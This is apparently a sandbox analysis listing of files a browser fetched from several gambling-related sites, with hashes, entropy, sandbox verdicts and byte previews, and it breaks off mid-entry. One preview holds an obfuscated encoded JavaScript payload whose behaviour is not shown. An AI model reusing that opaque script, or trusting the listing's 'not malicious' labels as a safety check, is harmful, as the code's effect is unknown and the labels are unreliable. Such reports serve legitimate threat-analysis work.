                                                                                                                                                          MD5:4DD817FCAA6B66B987CC9415894716B8
                                                                                                                                                          SHA1:EA57D7542100A0FDEAD72BFB96E4C330486486DF
                                                                                                                                                          SHA-256:9CA897EA7F9C32F28AE6419299623DBF4E1E311F4EAD569A94B27EBA4C1D6F10
                                                                                                                                                          SHA-512:05999ABE6B011A06EA092E9158CB2C6248BAFB816134E31CEDAE404637E8E0B9A039E77671EF1DAC92498FDE86B049D9AD6B1560E05C8CA638A21C3C8EB4DFE6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...Z...<........E....tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8" xmpMM:DocumentID="xmp.did:070664E5F77811E8AE71AEF0D532570E" xmpMM:InstanceID="xmp.iid:070664E4F77811E8AE71AEF0D532570E" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:c5537c56-d66b-9f4a-95f4-82eac84c99bc" stRef:documentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...w....IDATx..Z....>..U..3=...0l.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2164), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2164
                                                                                                                                                          Entropy (8bit):5.930686869403833
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:VftH0MNqZWMHdAOZEr3OGtIWCYyd+Cup1UUL9aROT++DVOH81z1Nazl:VfpQRdAYQbtIpZYCozwRXc791kR
                                                                                                                                                          MD5:F6EE3B5CBB435BC3AFC6886E32D80D34
                                                                                                                                                          SHA1:ED90E6EC7483E5264FA214E5CDBB5E0A53B747F2
                                                                                                                                                          SHA-256:F77B340A85EB74CA87A6210B27E27A462DAF403EA58998D293DEFDF434090F25
                                                                                                                                                          SHA-512:4ACE1B1394D658B7CE4DCD2A2DE6B572659C83DF72D92BA12C6B7E73BB0A50ACC52F7226E0A8FFCB4638C4E578ACF575A7EC43BC9730A82E4DFD25AA8766F57E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/analysis.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtArARgGYBdAGgG8AhAOQBEAWALgDMBXNGAFwEt1MB9UiFKcAlOQBErJCAAESTgCduXCQG4A8mABWILgDoAJiGbc0IAAqKUEEIs4BPTMIn9+IJAFkUh1gBsQCQoANyg/VhBGAEIABgBfUTVOTAkoAGoATg0JRNDFWRgAXmSJAFE0/AAlHNIoQvJFEDRjRRZ2Ll40THE82X5igAtuJH0AEhhGqE4QUoCAWybONUbOVkUuziGR/hk/Zn1+GAAfI/5RFMNuYJy40gUplUqmloAxNCRGbGJbxWKUgDUAKoAegAHDlMDB9FBaqQovhSGh/H5EcjUX4/IkQEYTFB/JxCop9CAAB4QFD2JC3MoVaptDg8PhzHz+YRuUCQWBwdxkimcJBuUjs8DQeD8RoAR1Y3EabnEUhk8iUKk46l6bgA6qVKBYAIIAYQA0vwAJKeCwaSoAFVKtH4ng0tEBABlSvwYm59RpPG5CsLOWLJdLZfwUjEYBBmDVNdq9UbTebLTa7Q6na7+Ph+H4fFAkANff7RdygzKQG4Up56MwXtH+FqdQbjWaLdbbfbHS63Zns4Zc/m3MZmHi/ATC1zxSApaW3PoujGG/Hm0m26nOxmszm83K1GOxaTyZSZ3VyAtNj4PuRs1BDAgAMr0jp8HpQfL9edxpuJ1spjvpj38L0fX4HEh3xfRAR4Px9AAcxATgAAkUAUE00GYFBumhNAwgcHgYCQZA1G4ZhMCiM4VjWNBZE2YZiRJPRbwmbgIGSXIX1kEBCkMFAYFYBY0E4GC4NmEA+P5SgHCtKBoOoKAFhSAZODmPwcmwGIyAJLieNE/QJhAKYZnmRYUiQRjmJyJJ9CQRQikEATHFsQoJGmElOGBbQoFCEzlDMkRoSQBwOEKWJfPQK9DEGGjSXo0zOCEaEIFsZp9SGPxDEwMRbiimAGO8zgH0ZSispypiWPIdUYBQOZmTQUYIO4PxR
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):15676
                                                                                                                                                          Entropy (8bit):7.95677851421634
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:trkksoIK3AL/H1VPrpeCm4uR72goHW11m71bmrvF:trDI0eH1VFeCm4E7IW14YrvF
                                                                                                                                                          MD5:E9D6F1F9FE9BD1A84D160111A694055B
                                                                                                                                                          SHA1:CAEAA79A384502FB99A1ECDC935F484415C025F7
                                                                                                                                                          SHA-256:2D45AA957F5D5C9D8B607977301737CBEC92E1A5BC21EA5C52001E3DC71796E3
                                                                                                                                                          SHA-512:9E044E7AC8DA66289449E26DF7FE3DA44739B37CBBCE9103061750D1760131F9C2297A9DE6FE22869FE16557A283C2EC86676DC312C06A240D6C4AF371FDE973
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/video/og_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:6D4B3F368D5911E7A155C2C7373E56B1" xmpMM:InstanceID="xmp.iid:6D4B3F358D5911E7A155C2C7373E56B1" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (434), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):434
                                                                                                                                                          Entropy (8bit):4.276446137177361
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:Lik4Xk4Lbk4L1ZTZmGk4LD9gIzLjp9gIzLz/Gg9gIzLPp:Li/X/Lb/LnVF/LD9lL19lL7Gg9lLPp
                                                                                                                                                          MD5:19E810547F1918B57C147ED44F6AA261
                                                                                                                                                          SHA1:DBD58ABFC0153B30EA2984040587920CC0CE89B5
                                                                                                                                                          SHA-256:7B63908F827B50DD226D1193CA39F9C03E48723E59ADAC3B2D94EFE99A36A40F
                                                                                                                                                          SHA-512:BD02054232A4EE1E115634C517B5602CC30F04BF7E661DE88D509B1A0A00A428A971B405626C4F4EE171FE44D6E1FEC8D5F34ACD3880348DDA45C82B844EDF65
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/061410/rcenter/msites/themes/default/common.css?v=1717580749344
                                                                                                                                                          Preview:@import "../base.css";@import "../../../common/themes/base.css";@import "../../../common/themes/default/bootstrap/bootstrap.css";@import "../../../common/themes/default/bootstrap-dialog/bootstrap-dialog.css";@import "../../../common/themes/default/font-awesome/font-awesome.css";@import "../../../msites/themes/default/style.css";@import "../../../msites/themes/default/content.css";@import "../../../msites/themes/default/login.css";
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (32089)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):92630
                                                                                                                                                          Entropy (8bit):5.303540999101494
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:dnu00HWWaRxkqJg09pYxoxDKMXJrg8hXXO4dK3kyfiLJBhdSZE+I+Qg7rbaN1RUp:ddkWgoBhcZRQgmW42qw
                                                                                                                                                          MD5:663628F795CB62444143FDE1EBDF2B5B
                                                                                                                                                          SHA1:1EC97B491C8A1C72055BD635F0C8DD843CAE43D6
                                                                                                                                                          SHA-256:AA084D3968AB19898EBBED807EBC134B622FAB78A888E7B36AE8386841636801
                                                                                                                                                          SHA-512:01FB64FCF0D44B95FD55813FF8E7521DF6E44B9CA3A7F4FCD4A185578833876FCE198C60EE2D937197545A12C3030F91DBD88ACAB62DC4213A8168C64E0C5D2D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/lib/jquery.min-1.9.1.js
                                                                                                                                                          Preview:/*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener||"load"===e.type||"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H)
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, baseline, precision 8, 659x544, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):75656
                                                                                                                                                          Entropy (8bit):7.973251684846932
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:aFt/QuDmbbvL7nMJ2DFOH9+8MFYPy2cKLnruYN1hM173nJ/s+YXxnFSj/dzvQ:uQs2DswFI9hfcIiYK5nObXLSLFvQ
                                                                                                                                                          MD5:B8D7A960A4B6C034F047FF01DD4D9C43
                                                                                                                                                          SHA1:59196BB3341EA91A5A55270224A76FDC20E0EA54
                                                                                                                                                          SHA-256:9F8AFC863F5B3C95ACB8B8006DBF54857C58C904170D2F89B372F0F29887923F
                                                                                                                                                          SHA-512:6613A02E861D4EAE2B2FFDAA58E8AE493855A831CA43D33C57AA54178509A0E0E02B5B0F1032F10EB912BE450447D3295209DD805C69FB740E613EB759FD923B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/video/guide.jpg
                                                                                                                                                          Preview:.............................................................................................................................................S....Adobe.d........... ..............................................................................................!1.A.."Qa.q.2...#B..R..b...$3r...C...%cs.45T..........................!1..AQa.."q2.B..#R..34.............?..l.3.+M..~.oe.I.YO..I.......*."*<v.HvI..'...L..\....On.Hd...d..Oo.`l9(.>....,.....2%.%...$E.tV.....l.m....Z.Y#l...Sh.~PF..5v{I...4&k,..Sp..6.;W.dv.,.....q...A.F..l.6. k.......L.u..@.e.....0....C....b4t.l..;f..6........&.#....aK.4..#..W..q..X|.b.G!..wjp.'*.3d..nT^{...../&..FoJ...#s..(..Q......).bn.2TsbM..6......UI.....Tk..C..l.).......+TJ.*.4..:..%.6Q......U.lGlNx...0...j$...(M.4./#N.tBL6.s...~.....E.d.r...lY[..#..o...5....;.tr....^AW.r.%..S|..C.....dpqy..7lT....7.......S..Z=...v..............U..g%.J'..9..l..g.{E,TT.... .G....d}.....V.....\....X$|.....~.........I6.7...7.,mFR<'...>m./..{...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 90 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4559
                                                                                                                                                          Entropy (8bit):7.827106635894467
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:CYzFTu2heep4YiLjLEakvXcg1gss5/1cyk59lGWpgFrimmKilbXCDDd:zw73vkv9gt5/yyGcUgFrimmKdd
                                                                                                                                                          MD5:B086C524DDE5F4979489F6A64E0B083C
                                                                                                                                                          SHA1:2BBC83084C9CEBFD37AAD47C5B65C12D5C671CFA
                                                                                                                                                          SHA-256:ABF134961C24281B03DF0BCBD87E497F81F727D3AF64EABEFC81261F978B876C
                                                                                                                                                          SHA-512:3D41230324900CC69468126AC240FD74BC45FE43794F53F4D94744608CAE199ED3B047728A16F44667CE67F96775065FD36B690AC4ACB710F8C4358343DEBBCB
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-b/game_bbin.png
                                                                                                                                                          Preview:.PNG........IHDR...Z...<........E....tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8" xmpMM:DocumentID="xmp.did:070664E1F77811E8AE71AEF0D532570E" xmpMM:InstanceID="xmp.iid:070664E0F77811E8AE71AEF0D532570E" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:c5537c56-d66b-9f4a-95f4-82eac84c99bc" stRef:documentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.|.W....IDATx..[ytT....6[f&!!.kY....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):17920
                                                                                                                                                          Entropy (8bit):7.954260425598395
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:6Xhq0luXIA7ppy5ZlQfVOgMGRWjji7v2FDzBKV9NVZuYGVhrfracy6HZyyaVnUgG:6E0WppU5ZlQfVbIa7v2DW6VrfrkyMn1G
                                                                                                                                                          MD5:9BEEFE094C5746596EB886A0F9CE9516
                                                                                                                                                          SHA1:043A5F197A8B4A8CC3B40A3126F1BFB8CBD12ADA
                                                                                                                                                          SHA-256:39A8BDC4F2DB24410A4A0D4180FF953D1AEC6EFDD7DBAC23A37D08C813214151
                                                                                                                                                          SHA-512:1F41A044818844CD6E734291116E0CAE1E5D93A7659823084103CC3ED3D862EDA115E2B44BA8F5809D0CDE91C9BB7EDCAD75403B196A1D5738105CACD2C6A831
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/video/lebo_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:E2893C229C1511E79144CCF7D3AEA9BF" xmpMM:InstanceID="xmp.iid:E2893C219C1511E79144CCF7D3AEA9BF" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1fa39400-0423-3b49-88e9-b820ab33a34b" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 22006
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):7599
                                                                                                                                                          Entropy (8bit):7.968812814531643
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:UCnHGpv0J0C/Iy2hh3zrHg+Gd7mhLabhwHp0KuClDpEclAdCX+gZc:UCnM0Jz/Iy2LrHgz7WL0qplINic
                                                                                                                                                          MD5:84191D1091731FC35BABF501FF6A08BF
                                                                                                                                                          SHA1:13F401266FC74700486A120BB0DF31E00152F492
                                                                                                                                                          SHA-256:51BAE893893C406293BF77A7D6B84E7741607005BD99A64BC9E9BE8F3A2A13F0
                                                                                                                                                          SHA-512:767A734B8FE2EAF78FADB068CE5629DC20BC917E87C6D954FFC3E36E8386DE6B3FA4306C1AC690F7E0562FCB97338C80AAE94B7B98C233C21E1A842147117817
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/ftl/commonPage/js/layer.js
                                                                                                                                                          Preview:...........<.n.Hr...2.".+..d.=C..ffg..fs..A..Z........-.x-.I.(y..A....erH.#U...(..&0`.?.]].U...Nzy.....y0.........../...........y...>KYQ.^o..&:;.......\..z..z.........Wg...,.E..p..Gg./..R.L......L....l.../..;....U.G...-./.t.f....6..y.f0.+..j8..Y.mU:....`......r.:kV.1..*.U..z{.@.wn.g.K......7K.9s........2....>+...........-y4.....fN.W..._....W/^N......}.U._?.>q.>..0..........lY%k|..d.P...65.....?.A..3.....n...B].v1b....z.(XP..[l..H<......*7......[6u.5N..t.n...<+>Z@.........O@.4T.......W.........%...s.n...K8..].'r..#...1.\..y.".<.<v..{A.6y.2...`.....8........ ..8...5.aT.K.b.;~..*........"^..kx..n............*..n...B........Z`.0Ho..S.bT.e..}....*+....0G.w.}.g..........q.o..f..Ge...=...|..|.R0.\/.....Y........,....*~.........$.H...U..]....x.....I.\.^''..^.........|.s....=...]......u...k....;.....l4..F#.d2#.#...~_>....{.b......E...*I2?..n.B.(N....@..}.@S..U..<_...G..N......(.:.......a....1Y<..U...L.vL.....b.b..*t.3P==X1J....P.l..*.....Jq........
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 16 x 19, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1210
                                                                                                                                                          Entropy (8bit):6.58861970219898
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:d1hmYaWwjx82lY2T3XVTfi0msyJ3VTH30I1GSi9n5+b6y1mZNwR:DMYLNn2Dpfvm/J3pHkI10n5i6y1ek
                                                                                                                                                          MD5:D968889F5AE7ABAD67732E77AA08FE65
                                                                                                                                                          SHA1:925BD37C255648CC3D06360696227FA56A2D61EB
                                                                                                                                                          SHA-256:C13DC87E12290A46BC6E0CA1542D972CCD8A3E643D6ED35DA52A38C6C0042821
                                                                                                                                                          SHA-512:E98048504C5613270D1E82B7B58313F366EE130A361A0F8ED67C74C172F08499BC6F1B8537F813A827D1768EEC4CEF99E8E1A3DFBB253FC54F23AE2994F44DF4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR..............g......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)" xmpMM:InstanceID="xmp.iid:118F5031FFFF11EB92E5AF78098ED89B" xmpMM:DocumentID="xmp.did:118F5032FFFF11EB92E5AF78098ED89B"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:118F502FFFFF11EB92E5AF78098ED89B" stRef:documentID="xmp.did:118F5030FFFF11EB92E5AF78098ED89B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..9....*IDATx.b...?.....@...G.x)VU ..&....?@|../.........].(T.q .G......g.3 ...U0<.j..6.....x.`..I.....J.d..^.q<
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 1000 x 100
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):230401
                                                                                                                                                          Entropy (8bit):7.932188158268366
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:e8kZ1m2kPTjI4PTjI4PTjI4Pk6NWWoDWoDWoDe:zeP2bb9WhDhDhDe
                                                                                                                                                          MD5:693DF977829DA3E7192DE107D21B601D
                                                                                                                                                          SHA1:C1A26C7AFD53136065B2425BD11C58601756B1F3
                                                                                                                                                          SHA-256:7171B5ACD31D4EA86B86F4D7EA092CADBC0301597947A92A4C66B342DF979B37
                                                                                                                                                          SHA-512:B93EF9CA478B754946C61D220985A0CDF853438572D63DF7290CB6E4D976E672E8BE240696CC35A4BEE3B0DF6DF7673F81B7E8465C9C579E2C1ACB320CA8677A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://www.image110.com/uploads/b05d090cc7736039c7941cc2c76c6fcc.gif
                                                                                                                                                          Preview:GIF89a..d.............J1..vc......n....i..h.tN.......V........./.2%.T...y....z.......%..fdGm...%.ObU^.o..n.........1.....YH-)......5.S0.K.......M...H.M......fG......M....S.&..,.....u.......X=......m5..y.m.lE8.g.i,.......B.}...!..4....3(.ll....0..&./$..t./..TC.nL.J*,Nr....Q..SJ.3'.C...i..E........)..V...........$......iO.klb80...m*C.......i....T.......,...5q*..pv..t.UK......h..............................f..............T...G".... /E...........5?........................:=...w.....c.......1R;@.....)..z......d...c..y......#u...R~..!...........< !.SX.......a..f...................................................................................................................}.........J.......).Q.........!..NETSCAPE2.0.....!.......,......d......D.....e.E.v.R.o."Z Dq...3FL.,..g.?:..c.t.!SV....tY.E..!...M.I...gj..":.GA..(.(:e.U..-Y.d.}[....*.Vc..,X.e.E....m.];7.].x...v......,8pV...*^..c.~.WS<9ke.._..2..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 191 x 120, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):46542
                                                                                                                                                          Entropy (8bit):7.990904213602547
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:gtcZzzF2leP662FYDDWawfDfy/o/kgZzNsADCQmd7CdUmmbB6SN3OFZ68L:gtCzzY2DDWac6/DQDDNdj2+JL
                                                                                                                                                          MD5:AB33D1BCC1F71565C98B2CFA843ADD37
                                                                                                                                                          SHA1:B87CE508B681EF6F0374B13BFA9E6F76EF72F331
                                                                                                                                                          SHA-256:350C0C31AC0829916F2EC32B030DD968B6439EE79589E1A03A71939244340066
                                                                                                                                                          SHA-512:07D89A2C10A0AD2C71E068D6CD8BE64F1FD6E6E3E37506D74639CE616A1E3B3F64A22FA05E39D8B296743D938ADCBEA1D9D2B5D2A25B49C61C424E5AEF0F8A2F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.......x.....,e.]....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:9A87830E7B7A11E8BDCD8E2655513498" xmpMM:DocumentID="xmp.did:9A87830F7B7A11E8BDCD8E2655513498"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9A87830C7B7A11E8BDCD8E2655513498" stRef:documentID="xmp.did:9A87830D7B7A11E8BDCD8E2655513498"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>u..y...>IDATx.|...l.U&.#..9..k...&DK.$d..^4.......W.....7..e{u.nC...4...Y !TR.T....w.9.OD..q..J`?]Iy.f.......
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 223 x 71, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):14180
                                                                                                                                                          Entropy (8bit):7.966892814985789
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:NE9xWiSv9rvQdPoVLya8Q90EqRvSiqaPWTqv:NE9x7PaTlyR9DuOv
                                                                                                                                                          MD5:3176C5FA0DCAAE73B8D8424D17679335
                                                                                                                                                          SHA1:245884B6988188E420123E25D9DA57B97C6EF700
